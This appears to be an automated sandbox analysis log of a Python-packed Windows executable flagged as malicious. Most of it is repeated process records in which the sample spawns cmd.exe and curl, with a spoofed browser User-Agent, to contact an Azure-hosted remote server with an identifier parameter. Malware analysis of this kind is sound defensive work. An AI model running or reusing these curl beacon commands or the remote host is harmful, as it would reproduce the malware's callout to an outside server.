Source: file.exe, 00000000.00000003.1752138241.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1749509984.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1750492184.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1751564708.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1750386943.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1754336115.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1750979635.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1752374384.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1750728421.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1750041127.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1750613362.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1753887474.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1752018194.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1751343265.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1753781951.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1749617862.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1758622084.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs file.exe
Source: file.exe, 00000000.00000003.1751453983.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1751802736.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1753659236.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1754433845.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs file.exe
Source: file.exe, 00000000.00000003.1750170866.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1749927325.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1753385800.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1748538960.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs file.exe
Source: file.exe, 00000000.00000003.1749715082.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1752254686.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1754551936.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs file.exe
Source: file.exe, 00000000.00000003.1753999667.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1749386479.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1751102339.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1750280448.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1751690780.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1753238604.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1754233802.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs file.exe
Source: file.exe, 00000000.00000003.1750835118.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs file.exe
Source: file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs file.exe
Source: file.exe, 00000000.00000003.1753536442.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs file.exe
Source: file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000001.00000002.3018631825.00007FFDFB708000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamepython311.dll. vs file.exe
Source: file.exe, 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs file.exe
Source: file.exe, 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs file.exe
Source: file.exe, 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs file.exe
Source: file.exe, 00000001.00000002.3019043287.00007FFE1A456000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs file.exe

Source: classification engine

Classification label: mal60.winEXE@63/51@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6399B29E0 GetLastError,FormatMessageW,MessageBoxW,

0_2_00007FF6399B29E0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI68922

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"

Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
